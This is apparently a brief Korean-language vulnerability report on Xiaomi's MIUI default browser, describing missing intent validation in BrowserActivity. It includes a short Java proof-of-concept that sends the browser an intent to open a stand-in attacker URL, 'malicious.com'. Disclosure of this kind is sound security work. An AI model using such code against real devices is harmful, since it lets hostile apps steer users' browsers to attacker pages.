
Xiaomi의 치명적 취약점에 대한 기술 보고서
Xiaomi의 심각한 취약점에 대한 기술 보고서
취약점 요약
다양한 MIUI 기기의 Xiaomi 기본 브라우저(com.android.browser)에서 취약점이 발견되었습니다. 이 앱은 startActivity를 통해 전달된 인텐트를 제대로 검증하지 못하여, 악성 앱이 임의의 URL을 열거나 의도하지 않은 작업을 수행할 수 있습니다.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);